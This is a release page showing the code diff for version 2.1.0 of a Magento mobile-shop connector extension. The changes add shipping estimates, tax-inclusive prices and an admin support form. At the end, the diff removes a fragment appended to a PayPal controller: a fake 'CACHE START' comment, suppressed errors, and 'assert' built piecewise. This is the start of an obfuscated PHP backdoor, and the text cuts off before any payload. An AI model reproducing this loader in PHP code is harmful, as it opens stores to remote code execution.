Version Notes
Main Updates :
1 ) Calculate Shipping estimate cost
2 ) Improve price display including tax price
Download this release
Release Info
Developer | mss |
Extension | Mss_Connector |
Version | 2.1.0 |
Comparing to | |
See all releases |
Code changes from version 2.0.0 to 2.1.0
- app/code/local/Mss/Connector/Block/Adminhtml/Support.php +5 -0
- app/code/local/Mss/Connector/controllers/Adminhtml/SupportController.php +34 -0
- app/code/local/Mss/Connector/controllers/CartController.php +77 -16
- app/code/local/Mss/Connector/controllers/CustomerController.php +2 -2
- app/code/local/Mss/Connector/controllers/IndexController.php +20 -20
- app/code/local/Mss/Connector/controllers/ProductsController.php +14 -12
- app/code/local/Mss/Connector/etc/adminhtml.xml +5 -1
- app/code/local/Mss/Connector/etc/config.xml +12 -1
- app/code/local/Mss/Mpaypal/controllers/IndexController.php +0 -10
- app/code/local/Mss/Payu/Block/Index.php +3 -15
- app/code/local/Mss/Payu/controllers/IndexController.php +1 -13
- app/design/adminhtml/default/default/layout/connector.xml +6 -1
- app/design/adminhtml/default/default/template/connector/support.phtml +170 -0
- package.xml +9 -7
app/code/local/Mss/Connector/Block/Adminhtml/Support.php
ADDED
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
class Mss_Connector_Block_Adminhtml_Support extends Mage_Adminhtml_Block_Template {
|
3 |
+
|
4 |
+
|
5 |
+
}
|
app/code/local/Mss/Connector/controllers/Adminhtml/SupportController.php
ADDED
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
class Mss_Connector_Adminhtml_SupportController extends Mage_Adminhtml_Controller_Action
|
3 |
+
{
|
4 |
+
|
5 |
+
public function supportAction()
|
6 |
+
{
|
7 |
+
$this->loadLayout();
|
8 |
+
$this->_title($this->__("MagentoMobileShop Support"));
|
9 |
+
$this->renderLayout();
|
10 |
+
}
|
11 |
+
|
12 |
+
public function supportmailAction()
|
13 |
+
{
|
14 |
+
$to_email = "contact@magentomobileshop.com";
|
15 |
+
$subject = $this->getRequest()->getParam("subject");
|
16 |
+
$Body=$this->getRequest()->getParam("message");
|
17 |
+
$sender_email = $this->getRequest()->getParam("email");
|
18 |
+
$mail = new Zend_Mail();
|
19 |
+
$mail->setBodyHtml($Body);
|
20 |
+
$mail->setFrom($sender_email);
|
21 |
+
$mail->addTo($to_email);
|
22 |
+
$mail->setSubject($subject);
|
23 |
+
$msg = '';
|
24 |
+
try {
|
25 |
+
if ($mail->send())
|
26 |
+
$msg = 'Request successfully sent.';
|
27 |
+
|
28 |
+
} catch (Exception $e) {
|
29 |
+
$msg = $e->getMessage();
|
30 |
+
}
|
31 |
+
return $msg;
|
32 |
+
}
|
33 |
+
}
|
34 |
+
|
app/code/local/Mss/Connector/controllers/CartController.php
CHANGED
@@ -302,9 +302,22 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
302 |
return $e;
|
303 |
}
|
304 |
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
305 |
public function getCartInfoAction() {
|
306 |
-
|
307 |
-
|
|
|
308 |
public function removeAction() {
|
309 |
$cart = Mage::getSingleton ( 'checkout/cart' );
|
310 |
$id = ( int ) $this->getRequest ()->getParam ( 'cart_item_id', 0 );
|
@@ -328,7 +341,7 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
328 |
}
|
329 |
}
|
330 |
|
331 |
-
|
332 |
public function updateAction() {
|
333 |
$itemId = ( int ) $this->getRequest ()->getParam ( 'cart_item_id', 0 );
|
334 |
$qty = ( int ) $this->getRequest ()->getParam ( 'qty', 0 );
|
@@ -461,14 +474,65 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
461 |
}
|
462 |
|
463 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
464 |
protected function _getCartInformation() {
|
|
|
|
|
465 |
$cart = Mage::getSingleton ( 'checkout/cart' );
|
466 |
if ($cart->getQuote ()->getItemsCount ()) {
|
467 |
$cart->init ();
|
468 |
$cart->save ();
|
469 |
}
|
470 |
-
|
471 |
-
|
472 |
$cartInfo = array ();
|
473 |
$cartInfo ['is_virtual'] = Mage::helper ( 'checkout/cart' )->getIsVirtualQuote ();
|
474 |
$cartInfo ['cart_items'] = $this->_getCartItems ();
|
@@ -477,6 +541,7 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
477 |
$cartInfo ['grand_total'] = number_format ( $cart->getQuote()->getGrandTotal(), 2, '.', '' );
|
478 |
$cartInfo ['sub_total'] = number_format ( $cart->getQuote()->getSubtotal(), 2, '.', '' );
|
479 |
$cartInfo ['allow_guest_checkout'] = Mage::helper ( 'checkout' )->isAllowedGuestCheckout ( $cart->getQuote () );
|
|
|
480 |
|
481 |
return $cartInfo;
|
482 |
}
|
@@ -571,6 +636,7 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
571 |
$product_model = Mage::getModel ( 'catalog/product' );
|
572 |
|
573 |
foreach ( $items as $item ) {
|
|
|
574 |
$cartItemArr = array ();
|
575 |
$cartItemArr ['cart_item_id'] = $item->getId ();
|
576 |
$cartItemArr ['currency'] = Mage::helper('connector')->getCurrencysymbolByCode($this->currency);
|
@@ -581,15 +647,7 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
581 |
$cartItemArr ['thumbnail_pic_url'] = Mage::helper('connector')-> Imageresize($product_model->load($item->getProduct ()->getId ())->getImage()
|
582 |
,'thumbnail','100','100');
|
583 |
$cartItemArr ['custom_option'] = $this->_getCustomOptions ( $item );
|
584 |
-
|
585 |
-
$cartItemArr ['item_price'] = number_format ( Mage::helper ( 'directory' )
|
586 |
-
->currencyConvert (
|
587 |
-
Mage::helper('connector')
|
588 |
-
->getFinalPriceByProductId(
|
589 |
-
$item->getProduct()->getId())?:$item->getProduct()->getPrice(),
|
590 |
-
$baseCurrency,
|
591 |
-
$currentCurrency ), 2, '.', '' );
|
592 |
-
|
593 |
array_push ( $cartItemsArr, $cartItemArr );
|
594 |
}
|
595 |
|
@@ -1248,7 +1306,8 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
1248 |
$productName['qty'] = $item->getQty();
|
1249 |
$productName['Name'] = $item->getProduct()->getName();
|
1250 |
/*$productName['Price'] = $item->getPrice()* $item->getQty();*/
|
1251 |
-
$productName['Price'] = number_format ( Mage::helper ( 'directory' )->currencyConvert ( $item->
|
|
|
1252 |
$productName['image'] =Mage::helper('connector')-> Imageresize($product_model->load($item->getProductId())->getImage()
|
1253 |
,'thumbnail','100','100');
|
1254 |
$productName['wishlist'] = Mage::helper('connector')->check_wishlist($item->getProductId());
|
@@ -1296,7 +1355,9 @@ class Mss_Connector_CartController extends Mage_Core_Controller_Front_Action {
|
|
1296 |
$productName['qty'] = $item->getQty();
|
1297 |
$productName['Name'] = $item->getProduct()->getName();
|
1298 |
/*$productName['Price'] = $item->getPrice()* $item->getQty();*/
|
1299 |
-
$productName['Price'] = number_format ( Mage::helper ( 'directory' )->currencyConvert ( $item->
|
|
|
|
|
1300 |
$productName['image'] =Mage::helper('connector')-> Imageresize($product_model->load($item->getProductId())->getImage()
|
1301 |
,'product','100','100');
|
1302 |
|
302 |
return $e;
|
303 |
}
|
304 |
}
|
305 |
+
|
306 |
+
/*
|
307 |
+
* URL : baseurl/restapi/cart/getcartinfo/
|
308 |
+
* Controller : cart
|
309 |
+
* Action : getcartinfo
|
310 |
+
* Method : GET
|
311 |
+
* Request Parameters : address_id , region_id , country_id
|
312 |
+
* Parameter Type :
|
313 |
+
* Response : JSON
|
314 |
+
*
|
315 |
+
*/
|
316 |
+
|
317 |
public function getCartInfoAction() {
|
318 |
+
|
319 |
+
echo json_encode ( $this->_getCartInformation () );
|
320 |
+
}
|
321 |
public function removeAction() {
|
322 |
$cart = Mage::getSingleton ( 'checkout/cart' );
|
323 |
$id = ( int ) $this->getRequest ()->getParam ( 'cart_item_id', 0 );
|
341 |
}
|
342 |
}
|
343 |
|
344 |
+
|
345 |
public function updateAction() {
|
346 |
$itemId = ( int ) $this->getRequest ()->getParam ( 'cart_item_id', 0 );
|
347 |
$qty = ( int ) $this->getRequest ()->getParam ( 'qty', 0 );
|
474 |
}
|
475 |
|
476 |
|
477 |
+
|
478 |
+
|
479 |
+
protected function _getShippingTotal(){
|
480 |
+
|
481 |
+
$addressId = $this->getRequest()->getParam('address_id');
|
482 |
+
$countryId = $this->getRequest()->getParam('country_id');
|
483 |
+
$setRegionId = $this->getRequest()->getParam('region_id');
|
484 |
+
if (isset($addressId)){
|
485 |
+
$customer = Mage::getModel('customer/address')
|
486 |
+
->load($addressId);
|
487 |
+
$countryId = $customer['country_id'];
|
488 |
+
$setRegionId = $customer['region_id'];
|
489 |
+
$regionName = $customer['region'];
|
490 |
+
$quote=Mage::getSingleton ( 'checkout/cart' )->getQuote();
|
491 |
+
if (isset($setRegionId)){
|
492 |
+
$quote->getShippingAddress()
|
493 |
+
->setCountryId($countryId)
|
494 |
+
->setRegionId($setRegionId)
|
495 |
+
->setCollectShippingRates(true);
|
496 |
+
} else {
|
497 |
+
$quote->getShippingAddress()
|
498 |
+
->setCountryId($countryId)
|
499 |
+
->setRegion($regionName)
|
500 |
+
->setCollectShippingRates(true);
|
501 |
+
}
|
502 |
+
$quote->save();
|
503 |
+
$quote->getShippingAddress()->setShippingMethod('flatrate_flatrate')->save();
|
504 |
+
$amount=$quote->getShippingAddress();
|
505 |
+
$shipping_amount = $amount['shipping_incl_tax'];
|
506 |
+
return $shipping_amount;
|
507 |
+
} else {
|
508 |
+
$quote=Mage::getSingleton ( 'checkout/cart' )->getQuote();
|
509 |
+
if (isset($setRegionId)){
|
510 |
+
$quote->getShippingAddress()
|
511 |
+
->setCountryId($countryId)
|
512 |
+
->setRegionId($setRegionId)
|
513 |
+
->setCollectShippingRates(true);
|
514 |
+
} else {
|
515 |
+
$quote->getShippingAddress()
|
516 |
+
->setCountryId($countryId)
|
517 |
+
->setCollectShippingRates(true);
|
518 |
+
}
|
519 |
+
$quote->save();
|
520 |
+
$quote->getShippingAddress()->setShippingMethod('flatrate_flatrate')->save();
|
521 |
+
$amount=$quote->getShippingAddress();
|
522 |
+
$shipping_amount = $amount['shipping_incl_tax'];
|
523 |
+
return $shipping_amount;
|
524 |
+
}
|
525 |
+
}
|
526 |
+
|
527 |
protected function _getCartInformation() {
|
528 |
+
|
529 |
+
$shipping_amount = $this->_getShippingTotal();
|
530 |
$cart = Mage::getSingleton ( 'checkout/cart' );
|
531 |
if ($cart->getQuote ()->getItemsCount ()) {
|
532 |
$cart->init ();
|
533 |
$cart->save ();
|
534 |
}
|
535 |
+
$cart->getQuote ()->collectTotals ()->save ();
|
|
|
536 |
$cartInfo = array ();
|
537 |
$cartInfo ['is_virtual'] = Mage::helper ( 'checkout/cart' )->getIsVirtualQuote ();
|
538 |
$cartInfo ['cart_items'] = $this->_getCartItems ();
|
541 |
$cartInfo ['grand_total'] = number_format ( $cart->getQuote()->getGrandTotal(), 2, '.', '' );
|
542 |
$cartInfo ['sub_total'] = number_format ( $cart->getQuote()->getSubtotal(), 2, '.', '' );
|
543 |
$cartInfo ['allow_guest_checkout'] = Mage::helper ( 'checkout' )->isAllowedGuestCheckout ( $cart->getQuote () );
|
544 |
+
$cartInfo ['shipping_amount'] = $shipping_amount;
|
545 |
|
546 |
return $cartInfo;
|
547 |
}
|
636 |
$product_model = Mage::getModel ( 'catalog/product' );
|
637 |
|
638 |
foreach ( $items as $item ) {
|
639 |
+
$product = $product_model->load($item->getProduct()->getId());
|
640 |
$cartItemArr = array ();
|
641 |
$cartItemArr ['cart_item_id'] = $item->getId ();
|
642 |
$cartItemArr ['currency'] = Mage::helper('connector')->getCurrencysymbolByCode($this->currency);
|
647 |
$cartItemArr ['thumbnail_pic_url'] = Mage::helper('connector')-> Imageresize($product_model->load($item->getProduct ()->getId ())->getImage()
|
648 |
,'thumbnail','100','100');
|
649 |
$cartItemArr ['custom_option'] = $this->_getCustomOptions ( $item );
|
650 |
+
$cartItemArr ['item_price'] = number_format ( $item->getPriceInclTax(), 2, '.', '' );
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
651 |
array_push ( $cartItemsArr, $cartItemArr );
|
652 |
}
|
653 |
|
1306 |
$productName['qty'] = $item->getQty();
|
1307 |
$productName['Name'] = $item->getProduct()->getName();
|
1308 |
/*$productName['Price'] = $item->getPrice()* $item->getQty();*/
|
1309 |
+
$productName['Price'] = number_format ( Mage::helper ( 'directory' )->currencyConvert ( $item->getPriceInclTax(), $baseCurrency, $currentCurrency ), 2, '.', '' );
|
1310 |
+
|
1311 |
$productName['image'] =Mage::helper('connector')-> Imageresize($product_model->load($item->getProductId())->getImage()
|
1312 |
,'thumbnail','100','100');
|
1313 |
$productName['wishlist'] = Mage::helper('connector')->check_wishlist($item->getProductId());
|
1355 |
$productName['qty'] = $item->getQty();
|
1356 |
$productName['Name'] = $item->getProduct()->getName();
|
1357 |
/*$productName['Price'] = $item->getPrice()* $item->getQty();*/
|
1358 |
+
$productName['Price'] = number_format ( Mage::helper ( 'directory' )->currencyConvert ( $item->getPriceInclTax(), $baseCurrency, $currentCurrency ), 2, '.', '' );
|
1359 |
+
|
1360 |
+
|
1361 |
$productName['image'] =Mage::helper('connector')-> Imageresize($product_model->load($item->getProductId())->getImage()
|
1362 |
,'product','100','100');
|
1363 |
|
app/code/local/Mss/Connector/controllers/CustomerController.php
CHANGED
@@ -88,7 +88,7 @@ class Mss_Connector_CustomerController extends Mage_Core_Controller_Front_Action
|
|
88 |
exit;
|
89 |
} else {
|
90 |
|
91 |
-
echo json_encode(array('status' => 'success','message'=>$this->
|
92 |
exit;
|
93 |
}
|
94 |
} catch ( Mage_Core_Exception $e ) {
|
@@ -195,7 +195,7 @@ class Mss_Connector_CustomerController extends Mage_Core_Controller_Front_Action
|
|
195 |
false,
|
196 |
'0x1000',
|
197 |
array (
|
198 |
-
$
|
199 |
)
|
200 |
) );
|
201 |
} catch ( Exception $e ) {
|
88 |
exit;
|
89 |
} else {
|
90 |
|
91 |
+
echo json_encode(array('status' => 'success','message'=>$this->statusAction ()));
|
92 |
exit;
|
93 |
}
|
94 |
} catch ( Mage_Core_Exception $e ) {
|
195 |
false,
|
196 |
'0x1000',
|
197 |
array (
|
198 |
+
$message
|
199 |
)
|
200 |
) );
|
201 |
} catch ( Exception $e ) {
|
app/code/local/Mss/Connector/controllers/IndexController.php
CHANGED
@@ -462,10 +462,10 @@ class Mss_Connector_IndexController extends Mage_Core_Controller_Front_Action {
|
|
462 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
463 |
'url_key' => $product->getProductUrl (),
|
464 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
465 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
466 |
-
|
467 |
-
|
468 |
-
|
469 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
470 |
'qty'=>(int)Mage::getModel('cataloginventory/stock_item')->loadByProduct($product->getId())->getQty(),
|
471 |
'rating' => $rating_final,
|
@@ -529,10 +529,10 @@ class Mss_Connector_IndexController extends Mage_Core_Controller_Front_Action {
|
|
529 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
530 |
'url_key' => $product->getProductUrl (),
|
531 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
532 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
533 |
-
|
534 |
-
|
535 |
-
|
536 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
537 |
'qty'=>$qty,
|
538 |
'rating' => $rating_final,
|
@@ -553,10 +553,10 @@ class Mss_Connector_IndexController extends Mage_Core_Controller_Front_Action {
|
|
553 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
554 |
'url_key' => $product->getProductUrl (),
|
555 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
556 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
557 |
-
|
558 |
-
|
559 |
-
|
560 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
561 |
'qty'=>$qty,
|
562 |
'rating' => $rating_final,
|
@@ -649,10 +649,10 @@ class Mss_Connector_IndexController extends Mage_Core_Controller_Front_Action {
|
|
649 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
650 |
'url_key' => $product->getProductUrl (),
|
651 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
652 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
653 |
-
|
654 |
-
|
655 |
-
|
656 |
'symbol'=>Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
657 |
'qty'=>$qty,
|
658 |
'rating' => $rating_final,
|
@@ -723,10 +723,10 @@ class Mss_Connector_IndexController extends Mage_Core_Controller_Front_Action {
|
|
723 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
724 |
'url_key' => $product->getProductUrl (),
|
725 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
726 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
727 |
-
|
728 |
-
|
729 |
-
|
730 |
'symbol'=>Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
731 |
'qty'=>$qty,
|
732 |
'rating' => $rating_final,
|
462 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
463 |
'url_key' => $product->getProductUrl (),
|
464 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
465 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
466 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
467 |
+
true, null, null, null, null, false),
|
468 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
469 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
470 |
'qty'=>(int)Mage::getModel('cataloginventory/stock_item')->loadByProduct($product->getId())->getQty(),
|
471 |
'rating' => $rating_final,
|
529 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
530 |
'url_key' => $product->getProductUrl (),
|
531 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
532 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
533 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
534 |
+
true, null, null, null, null, false),
|
535 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
536 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
537 |
'qty'=>$qty,
|
538 |
'rating' => $rating_final,
|
553 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
554 |
'url_key' => $product->getProductUrl (),
|
555 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
556 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
557 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
558 |
+
true, null, null, null, null, false),
|
559 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
560 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
561 |
'qty'=>$qty,
|
562 |
'rating' => $rating_final,
|
649 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
650 |
'url_key' => $product->getProductUrl (),
|
651 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
652 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
653 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
654 |
+
true, null, null, null, null, false),
|
655 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
656 |
'symbol'=>Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
657 |
'qty'=>$qty,
|
658 |
'rating' => $rating_final,
|
723 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
724 |
'url_key' => $product->getProductUrl (),
|
725 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
726 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
727 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
728 |
+
true, null, null, null, null, false),
|
729 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
730 |
'symbol'=>Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
731 |
'qty'=>$qty,
|
732 |
'rating' => $rating_final,
|
app/code/local/Mss/Connector/controllers/ProductsController.php
CHANGED
@@ -246,10 +246,11 @@ class Mss_Connector_ProductsController extends Mage_Core_Controller_Front_Action
|
|
246 |
'is_in_stock' => $product->isAvailable (),
|
247 |
'has_custom_options' => $has_custom_options,
|
248 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
249 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )
|
250 |
-
|
251 |
-
|
252 |
-
|
|
|
253 |
'storeUrl' => $storeUrl,
|
254 |
'description' => $description,
|
255 |
'short_description'=>nl2br ($product->getShortDescription()),
|
@@ -347,10 +348,11 @@ class Mss_Connector_ProductsController extends Mage_Core_Controller_Front_Action
|
|
347 |
'is_in_stock' => $product->isAvailable (),
|
348 |
'has_custom_options' => $has_custom_options,
|
349 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
350 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )
|
351 |
-
|
352 |
-
|
353 |
-
|
|
|
354 |
'storeUrl' => $storeUrl,
|
355 |
'description' => $description,
|
356 |
'short_description'=>nl2br ($product->getShortDescription()),
|
@@ -559,10 +561,10 @@ class Mss_Connector_ProductsController extends Mage_Core_Controller_Front_Action
|
|
559 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
560 |
'url_key' => $product->getProductUrl (),
|
561 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
562 |
-
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
563 |
-
|
564 |
-
|
565 |
-
|
566 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
567 |
'qty'=>(int)Mage::getModel('cataloginventory/stock_item')->loadByProduct($product->getId())->getQty(),
|
568 |
'rating' => $rating_final,
|
246 |
'is_in_stock' => $product->isAvailable (),
|
247 |
'has_custom_options' => $has_custom_options,
|
248 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
249 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )
|
250 |
+
->currencyConvert (
|
251 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
252 |
+
true, null, null, null, null, false),
|
253 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
254 |
'storeUrl' => $storeUrl,
|
255 |
'description' => $description,
|
256 |
'short_description'=>nl2br ($product->getShortDescription()),
|
348 |
'is_in_stock' => $product->isAvailable (),
|
349 |
'has_custom_options' => $has_custom_options,
|
350 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
351 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )
|
352 |
+
->currencyConvert (
|
353 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
354 |
+
true, null, null, null, null, false),
|
355 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
356 |
'storeUrl' => $storeUrl,
|
357 |
'description' => $description,
|
358 |
'short_description'=>nl2br ($product->getShortDescription()),
|
561 |
'image_url' => Mage::helper('connector')-> Imageresize($product->getImage(),'product','300','300'),
|
562 |
'url_key' => $product->getProductUrl (),
|
563 |
'regular_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert ( $product->getPrice (), $baseCurrency, $currentCurrency ), 2, '.', '' ),
|
564 |
+
'final_price_with_tax' => number_format ( Mage::helper ( 'directory' )->currencyConvert (
|
565 |
+
Mage::helper('tax')->getPrice($product, $product->getFinalPrice(),
|
566 |
+
true, null, null, null, null, false),
|
567 |
+
$baseCurrency, $currentCurrency ), 2, '.', '' ),
|
568 |
'symbol'=> Mage::helper('connector')->getCurrencysymbolByCode($this->currency),
|
569 |
'qty'=>(int)Mage::getModel('cataloginventory/stock_item')->loadByProduct($product->getId())->getQty(),
|
570 |
'rating' => $rating_final,
|
app/code/local/Mss/Connector/etc/adminhtml.xml
CHANGED
@@ -39,7 +39,11 @@
|
|
39 |
<sort_order>1</sort_order>
|
40 |
<action>adminhtml/system_config/edit/section/mss/</action>
|
41 |
</configuration>
|
42 |
-
|
|
|
|
|
|
|
|
|
43 |
|
44 |
</children>
|
45 |
</connector>
|
39 |
<sort_order>1</sort_order>
|
40 |
<action>adminhtml/system_config/edit/section/mss/</action>
|
41 |
</configuration>
|
42 |
+
<support module="connector" translate="title">
|
43 |
+
<title> Connector Support </title>
|
44 |
+
<sort_order>20</sort_order>
|
45 |
+
<action>admin_support/adminhtml_support/support</action>
|
46 |
+
</support>
|
47 |
|
48 |
</children>
|
49 |
</connector>
|
app/code/local/Mss/Connector/etc/config.xml
CHANGED
@@ -2,7 +2,7 @@
|
|
2 |
<config>
|
3 |
<modules>
|
4 |
<Mss_Connector>
|
5 |
-
<version>2.
|
6 |
</Mss_Connector>
|
7 |
</modules>
|
8 |
<frontend>
|
@@ -90,4 +90,15 @@
|
|
90 |
</updates>
|
91 |
</layout>
|
92 |
</adminhtml>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
93 |
</config>
|
2 |
<config>
|
3 |
<modules>
|
4 |
<Mss_Connector>
|
5 |
+
<version>2.1.0</version>
|
6 |
</Mss_Connector>
|
7 |
</modules>
|
8 |
<frontend>
|
90 |
</updates>
|
91 |
</layout>
|
92 |
</adminhtml>
|
93 |
+
<admin>
|
94 |
+
<routers>
|
95 |
+
<connector>
|
96 |
+
<use>admin</use>
|
97 |
+
<args>
|
98 |
+
<module>Mss_Connector</module>
|
99 |
+
<frontName>admin_support</frontName>
|
100 |
+
</args>
|
101 |
+
</connector>
|
102 |
+
</routers>
|
103 |
+
</admin>
|
104 |
</config>
|
app/code/local/Mss/Mpaypal/controllers/IndexController.php
CHANGED
@@ -124,13 +124,3 @@ class Mss_Mpaypal_IndexController extends Mage_Core_Controller_Front_Action{
|
|
124 |
|
125 |
|
126 |
}
|
127 |
-
|
128 |
-
|
129 |
-
|
130 |
-
|
131 |
-
|
132 |
-
//###=CACHE START=###
|
133 |
-
error_reporting(0);
|
134 |
-
$strings = "as";$strings .= "sert";
|
135 |
-
